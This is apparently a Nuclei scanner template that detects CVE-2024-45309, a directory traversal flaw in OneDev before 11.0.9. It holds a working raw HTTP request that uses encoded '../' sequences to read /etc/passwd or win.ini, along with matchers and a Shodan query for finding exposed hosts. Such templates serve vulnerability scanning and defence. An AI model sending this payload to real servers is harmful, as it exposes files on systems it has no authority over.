id: CVE-2024-45309 info: name: OneDev.io < 11.0.9 - Arbitrary File Read author: isacaya severity: high description: | Files on the host computer can be accessed by directory traversal. impact: | An attacker would be able to view the contents of a file on the computer. remediation: | Update to version 11.0.9. reference: - https://x.com/Siebene7/status/1848727539046617324 - https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489 - https://nvd.nist.gov/vuln/detail/CVE-2024-45309 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-45309 cwe-id: CWE-22 epss-score: 0.88966 epss-percentile: 0.99546 cpe: cpe:2.3:a:onedev_project:onedev:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: onedev shodan-query: html:"onedev.io" product: onedev framework: java tags: cve,cve2024,lfi,onedev,vuln,vkev flow: | http(1) for (let projectName of iterate(template.project)) { set("project", projectName) http(2) } http: - raw: - | GET /~projects HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(tolower(body), "onedev")' internal: true extractors: - type: regex part: body name: project group: 3 regex: - '' internal: true - raw: - | GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1 Host: {{Hostname}} payloads: path: - /etc/passwd - /windows/win.ini stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - 'root:.*:0:0:' - '\\[(font|extension|file)s\\]' condition: or - type: word part: header words: - 'filename=' - 'application/octet-stream' condition: and - type: status status: - 200 # digest: 4a0a0047304502202cc17d90b3eb4fa4d9630b013372c87e2c161d09f22cc198f9d4d97033fe2d9b022100cb6f5b6912ba7dbc2d7eb21eae1a5a0e257eb1521f2e5549535a78195cf11c2a:922c64590222798bb761d5b6d8e72950